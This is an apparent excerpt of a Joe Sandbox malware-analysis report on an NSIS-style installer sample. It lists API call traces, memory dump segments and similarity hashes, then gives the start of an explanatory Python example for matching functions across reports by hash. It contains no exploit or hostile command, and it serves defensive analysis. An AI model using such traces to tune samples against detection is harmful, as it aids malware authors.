                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                                                  • Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                                                                                                                                                  • Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                                                                                                                  • Opcode ID: 9a6f1723ccae85cdcaba9e8d0745f1ec3aecba43bd242a0864222bc0e19a8310
                                                                                                                                                                                                                                  • Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a6f1723ccae85cdcaba9e8d0745f1ec3aecba43bd242a0864222bc0e19a8310
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                  • Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                                                                                                                                                  • Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
APIs
• lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
• wsprintfW.USER32 ref: 00404C88
• SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 6bd36fcdb12aee5803283967c3a86c6e4a5ad70b015d4a675e33b43a1d1abb6e
• Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
• Opcode Fuzzy Hash: 6bd36fcdb12aee5803283967c3a86c6e4a5ad70b015d4a675e33b43a1d1abb6e
• Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CB6
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CC0
• lstrcatW.KERNEL32(?,0040A014), ref: 00405CD2
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3081826266
• Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
• Instruction ID: ab420094dca872cde134391ad8eb9d2612fe0bdf2854729f0df44d947378a899
• Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
• Instruction Fuzzy Hash: 0FD0A771101A30AAC1116B499D04DEF72ACEE85304741003FF641B30A0CB7C5D5297FD
APIs
• DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
• GetTickCount.KERNEL32 ref: 00402FE2
• CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
• ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
• Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
• Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
• Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD
APIs
  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
  • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
  • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
• lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E11
• GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405E21
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405DB8
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                  • API String ID: 3248276644-3081826266
                                                                                                                                                                                                                                  • Opcode ID: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                                                                                                                                                                                  • Instruction ID: 2671ab18330f60560c3719f84a1496f0714d5bb9fce48f62cd6cce0e1185a57b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAF0F935108E6156D621333A6D0D6AF2504CE82364756853FFC52B12D5DF3C89539DBE
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 004053E6
                                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405437
                                                                                                                                                                                                                                    • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                                                                                                                                                                                  Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
• Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
• Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
• Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69
APIs
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,004226E8,00000000,?,?,: Completed,?,?,00406538,80000002), ref: 004062EF
• RegCloseKey.ADVAPI32(?,?,00406538,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,004226E8), ref: 004062FA
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
• Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
• Instruction ID: ae085d710551058a7f2532bbeea434883cb59e3c9f2bcee9d1549068d4bd9198
• Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
• Instruction Fuzzy Hash: B9015A72500209EADF218F51CC09EDB3BA8EF95364F01803AFD1AA6190D738D968DFA4
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
• CloseHandle.KERNEL32(?), ref: 004059FA
Strings
• Error launching installer, xrefs: 004059D7
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                  • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                                                                                  • Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C

APIs
• FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004039ED,00403803,00000007,?,00000007,00000009,0000000B), ref: 00403A2F
• GlobalFree.KERNEL32(?), ref: 00403A36
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403A15
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3081826266
• Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
• Instruction ID: e31a7033e06264a748858091d27326a34299cb79b9d6c3cb96cb008d14d5ef43
• Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
• Instruction Fuzzy Hash: 53E0EC36A511205BC7219F45AA0875E7BADAF58B22F05012AE8857B27087745C824F98

APIs
• lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D02
• CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D12
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve 00000000.00000002.* dump segments (0x400000 through 0x44C000) listed for the Free$GlobalLibrary function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-224404859
• Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
• Instruction ID: 6b3ae82466a78d2b10de00fa1d507c540e6bf26c2d05194e9d44ea340b0cb8a4
• Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
• Instruction Fuzzy Hash: 48D05EB24109209AC3126705EC089AF67A8EF5130074A842BF841A61A5D7785C8186AC

APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
• CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
• lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: the same twelve 00000000.00000002.* dump segments (0x400000 through 0x44C000) listed for the Free$GlobalLibrary function above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
• Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
• Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
• Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9
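The Similarity fields in each function entry (API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) exist so that a function can be matched against functions seen in other reports. The Python below is an added example, written for this page and not part of Joe Sandbox or its report output: it parses entries in the bullet layout used above into records and lists the functions two reports have in common. SAMPLE_A copies two entries from this section (hashes verbatim, argument lists shortened); SAMPLE_B is a constructed second report that shares one function with it. Matching on Opcode ID rather than String ID is this example's choice, on the assumption that the Opcode ID is computed from the code and not from the string operand, which the report does not state.

```python
import re

# Constructed excerpts in the layout of the report's per-function entries.
# SAMPLE_A copies two entries from this section; SAMPLE_B is an invented
# second report that shares the CharPrevlstrlen function (same Opcode ID,
# different string operand) and adds one function not seen here.
SAMPLE_A = r"""
APIs
• FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004039ED), ref: 00403A2F
• GlobalFree.KERNEL32(?), ref: 00403A36
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403A15
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
APIs
• lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop), ref: 00405D02
• CharPrevW.USER32(00438800,00000000), ref: 00405D12
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
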